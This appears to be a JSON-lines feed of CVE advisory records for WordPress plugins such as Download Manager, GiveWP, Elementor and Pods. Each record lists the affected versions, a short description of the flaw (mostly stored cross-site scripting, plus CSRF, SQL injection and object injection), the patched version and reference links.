{"CVE_ID":"CVE-2022-4756","slug":"youtube-channel","versionEndExcluding":"3.23.0","description":"The My YouTube Channel WordPress plugin before 3.23.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d67b0f7a-fdb1-4305-9976-c5f77b0e3b61\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d67b0f7a-fdb1-4305-9976-c5f77b0e3b61\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2331","slug":"give","versionImpact":"3.22.1","versionEndExcluding":"3.22.2","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.22.1 via a misconfigured capability check in the 'permissionsCheck' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive data including reports detailing donors and donation amounts.","recommendation":"Update to version 3.22.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/API\\\/Endpoints\\\/Reports\\\/Endpoint.php?rev=3252319#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/API\\\/Endpoints\\\/Reports\\\/Endpoint.php?rev=3252319#L117\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/API\\\/Endpoints\\\/Reports\\\/Endpoint.php?rev=3252319#L227\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/API\\\/Endpoints\\\/Reports\\\/Endpoint.php?rev=3252319#L227\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/API\\\/Endpoints\\\/Reports\\\/Endpoint.php?rev=3252319#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/API\\\/Endpoints\\\/Reports\\\/Endpoint.php?rev=3252319#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258797\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258797\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4d9acfb-bb9d-4b00-b439-c7ccea751f8d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4d9acfb-bb9d-4b00-b439-c7ccea751f8d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4619","slug":"elementor","versionImpact":"3.21.4","versionEndExcluding":"3.22.0-beta2","description":"The Elementor Website Builder \u2013 More than Just a Page Builder plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the \u2018hover_animation\u2019 parameter in versions up to, and including, 3.21.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.22.0-beta2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7e1028e-e04b-46c4-b574-889d9fc1069d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7e1028e-e04b-46c4-b574-889d9fc1069d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/trunk\\\/includes\\\/widgets\\\/image-box.php#L696\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/trunk\\\/includes\\\/widgets\\\/image-box.php#L696\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089420\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089420\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4107","slug":"elementor-pro","versionImpact":"3.21.0","versionEndExcluding":"3.21.2","description":"The Elementor Website Builder \u2013 More than Just a Page Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the several parameters in versions up to, and including, 3.21.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.21.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d5d47bd-4f05-4dc7-84c1-f7bc1196ee16?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d5d47bd-4f05-4dc7-84c1-f7bc1196ee16?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/doc.clickup.com\\\/9011113249\\\/d\\\/h\\\/8chnb91-5091\\\/3951e6f2afbd388\",\"name\":\"https:\\\/\\\/doc.clickup.com\\\/9011113249\\\/d\\\/h\\\/8chnb91-5091\\\/3951e6f2afbd388\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0912","slug":"give","versionImpact":"3.19.4","versionEndExcluding":"3.20.0","description":"The Donations Widget plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.19.4 via deserialization of untrusted input from the Donation Form through the 'card_address' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to achieve remote code execution.","recommendation":"Update to version 3.20.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/impress-org\\\/givewp\\\/pull\\\/7679\\\/files\",\"name\":\"https:\\\/\\\/github.com\\\/impress-org\\\/givewp\\\/pull\\\/7679\\\/files\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234114\\\/give\\\/trunk\\\/src\\\/Donations\\\/Properties\\\/BillingAddress.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234114\\\/give\\\/trunk\\\/src\\\/Donations\\\/Properties\\\/BillingAddress.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234114\\\/give\\\/trunk\\\/src\\\/Donations\\\/Repositories\\\/DonationRepository.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234114\\\/give\\\/trunk\\\/src\\\/Donations\\\/Repositories\\\/DonationRepository.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234114\\\/give\\\/trunk\\\/src\\\/Donors\\\/Repositories\\\/DonorRepository.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234114\\\/give\\\/trunk\\\/src\\\/Donors\\\/Repositories\\\/DonorRepository.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3234114%40give&new=3234114%40give&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3234114%40give&new=3234114%40give&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a8ae1b0-e9a0-4179-970b-dbcb0642547c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a8ae1b0-e9a0-4179-970b-dbcb0642547c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8284","slug":"download-manager","versionImpact":"3.2.98","versionEndExcluding":"3.2.99","description":"The Download Manager WordPress plugin before 3.2.99 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 3.2.99, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93e38b8c-8a2e-4264-b520-ebdbe995d61e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93e38b8c-8a2e-4264-b520-ebdbe995d61e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6208","slug":"download-manager","versionImpact":"3.2.97","versionEndExcluding":"3.2.98","description":"The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpdm_all_packages' shortcode in all versions up to, and including, 3.2.97 due to insufficient input sanitization and output escaping on the 'cols' parameter. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.98, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c67d2f8-d918-42ef-a301-27eed7fa41b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c67d2f8-d918-42ef-a301-27eed7fa41b2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/views\\\/all-packages-shortcode.php?rev=3097323#L302\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/views\\\/all-packages-shortcode.php?rev=3097323#L302\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/views\\\/all-packages-shortcode.php?rev=3097323#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/views\\\/all-packages-shortcode.php?rev=3097323#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3126662\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3126662\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4001","slug":"download-manager","versionImpact":"3.2.93","versionEndExcluding":"3.2.94","description":"The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpdm_modal_login_form' shortcode in all versions up to, and including, 3.2.93 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.94, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b478d88d-1423-4a33-b8ef-08b9e66a5d98?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b478d88d-1423-4a33-b8ef-08b9e66a5d98?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096459\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096459\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2098","slug":"download-manager","versionImpact":"3.2.89","versionEndExcluding":"3.2.90","description":"The Download Manager plugin for WordPress is vulnerable to unauthorized access of data due to an improper authorization check on the 'protectMediaLibrary' function in all versions up to, and including, 3.2.89. This makes it possible for unauthenticated attackers to download password-protected files.","recommendation":"Update to version 3.2.90, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1301c8af-d81a-40f1-96fa-e8252309d8a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1301c8af-d81a-40f1-96fa-e8252309d8a4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072712\\\/download-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072712\\\/download-manager\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8759","slug":"wp-nested-pages","versionImpact":"3.2.8","versionEndExcluding":"3.2.9","description":"The Nested Pages WordPress plugin before 3.2.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3dd41ecb-d0dc-4c23-9e5b-b1f7fbaaddfd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3dd41ecb-d0dc-4c23-9e5b-b1f7fbaaddfd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0333","slug":"templatesnext-toolkit","versionEndExcluding":"3.2.9","description":"The TemplatesNext ToolKit WordPress plugin before 3.2.9 does not validate some of its shortcode attributes before using them to generate an HTML tag, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e86ff4d5-d549-4c71-b80e-6a9b3bfddbfc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e86ff4d5-d549-4c71-b80e-6a9b3bfddbfc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1766","slug":"download-manager","versionImpact":"3.2.86","versionEndExcluding":"3.2.87","description":"The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a user's Display Name in all versions up to, and including, 3.2.86 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability requires social engineering to successfully exploit, and the impact would be very limited due to the attacker requiring a user to login as the user with the injected payload for execution.","recommendation":"Update to version 3.2.87, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9774c999-acb6-4c5f-ad6c-10979660b164?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9774c999-acb6-4c5f-ad6c-10979660b164?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/User\\\/views\\\/dashboard\\\/edit-profile.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/User\\\/views\\\/dashboard\\\/edit-profile.php#L16\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6954","slug":"download-manager","versionImpact":"3.2.85","versionEndExcluding":"3.2.86","description":"The Download Manager Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.2.85 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.86, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cdd64a4-040b-4dc9-a8df-dbecfeb928c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cdd64a4-040b-4dc9-a8df-dbecfeb928c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.83\\\/src\\\/Category\\\/Shortcodes.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.83\\\/src\\\/Category\\\/Shortcodes.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.83\\\/src\\\/Package\\\/Shortcodes.php#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.83\\\/src\\\/Package\\\/Shortcodes.php#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.83\\\/src\\\/Package\\\/views\\\/packages-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.83\\\/src\\\/Package\\\/views\\\/packages-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.83\\\/src\\\/Package\\\/views\\\/packages-shortcode-toolbar.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.83\\\/src\\\/Package\\\/views\\\/packages-shortcode-toolbar.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6421","slug":"download-manager","versionImpact":"3.2.82","versionEndExcluding":"3.2.83","description":"The Download Manager WordPress plugin before 3.2.83 does not protect file download's passwords, leaking it upon receiving an invalid one.","recommendation":"Update to version 3.2.83, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/244c7c00-fc8d-4a73-bbe0-7865c621d410\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/244c7c00-fc8d-4a73-bbe0-7865c621d410\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1446","slug":"pods","versionImpact":"3.2.8.1","versionEndExcluding":"3.2.8.2","description":"The Pods  WordPress plugin before 3.2.8.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 3.2.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c170fb45-7ed5-40ef-99f6-8da035a23d89\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c170fb45-7ed5-40ef-99f6-8da035a23d89\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11849","slug":"pods","versionImpact":"3.2.8","versionEndExcluding":"3.2.8.1","description":"The Pods  WordPress plugin before 3.2.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.2.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85b25a5b-c30b-4a2a-96c1-f05b4eba8a9b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85b25a5b-c30b-4a2a-96c1-f05b4eba8a9b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12636","slug":"wplegalpages","versionImpact":"3.2.7","versionEndExcluding":"3.2.8","description":"The Privacy Policy Generator, Terms & Conditions Generator WordPress Plugin : WP Legal Pages plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.6. This is due to missing or incorrect nonce validation on the 'create_popup_delete_process' function. This makes it possible for unauthenticated attackers to delete popups via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212527%40wplegalpages&new=3212527%40wplegalpages&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212527%40wplegalpages&new=3212527%40wplegalpages&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8da64b2f-8546-4276-9dbf-b60e885a0309?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8da64b2f-8546-4276-9dbf-b60e885a0309?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4678","slug":"templatesnext-toolkit","versionEndExcluding":"3.2.8","description":"The TemplatesNext ToolKit WordPress plugin before 3.2.8 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a36d665-a0ca-4346-8e55-cf9ba45966cc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a36d665-a0ca-4346-8e55-cf9ba45966cc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1312","slug":"ultimate-blocks","versionImpact":"3.2.7","versionEndExcluding":"3.2.8","description":"The Ultimate Blocks \u2013 WordPress Blocks Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'buttonTextColor\u2019 parameter in all versions up to, and including, 3.2.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/call-to-action\\\/block.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/call-to-action\\\/block.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260377\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260377\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac422162-be05-4420-9877-d6d41b83e881?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac422162-be05-4420-9877-d6d41b83e881?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5943","slug":"wp-nested-pages","versionImpact":"3.2.7","versionEndExcluding":"3.2.8","description":"The Nested Pages plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.7. This is due to missing or incorrect nonce validation on the 'settingsPage' function and missing santization of the 'tab' parameter. This makes it possible for unauthenticated attackers to call local php files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2663150-61f9-49e3-9219-fbe89cc6b03c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2663150-61f9-49e3-9219-fbe89cc6b03c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-nested-pages\\\/trunk\\\/app\\\/Config\\\/Settings.php#L129\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-nested-pages\\\/trunk\\\/app\\\/Config\\\/Settings.php#L129\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-nested-pages\\\/trunk\\\/app\\\/Views\\\/settings\\\/settings.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-nested-pages\\\/trunk\\\/app\\\/Views\\\/settings\\\/settings.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3111847\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3111847\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2305","slug":"download-manager","versionEndExcluding":"3.2.71","description":"The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpdm_members', 'wpdm_login_form', 'wpdm_reg_form' shortcodes in versions up to, and including, 3.2.70 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2906403%40download-manager&new=2906403%40download-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2906403%40download-manager&new=2906403%40download-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.70\\\/src\\\/User\\\/views\\\/members.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.70\\\/src\\\/User\\\/views\\\/members.php#L10\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a66bc196-e5f8-46b4-a81c-c888eb64021c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a66bc196-e5f8-46b4-a81c-c888eb64021c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.70\\\/src\\\/User\\\/views\\\/login-form.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.70\\\/src\\\/User\\\/views\\\/login-form.php#L10\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.70\\\/src\\\/User\\\/views\\\/reg-form.php#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.70\\\/src\\\/User\\\/views\\\/reg-form.php#L11\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1524","slug":"download-manager","versionEndExcluding":"3.2.71","description":"The Download Manager WordPress plugin before 3.2.71 does not adequately validate passwords for password-protected files. Upon validation, a master key is generated and exposed to the user, which may be used to download any password-protected file on the server, allowing a user to download any file with the knowledge of any one file's password.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3802d15d-9bfd-4762-ab8a-04475451868e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3802d15d-9bfd-4762-ab8a-04475451868e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9883","slug":"pods","versionImpact":"3.2.7","versionEndExcluding":"3.2.7.1","description":"The Pods  WordPress plugin before 3.2.7.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea4b277e-ef47-4e38-bd82-c5a54a95372f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea4b277e-ef47-4e38-bd82-c5a54a95372f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
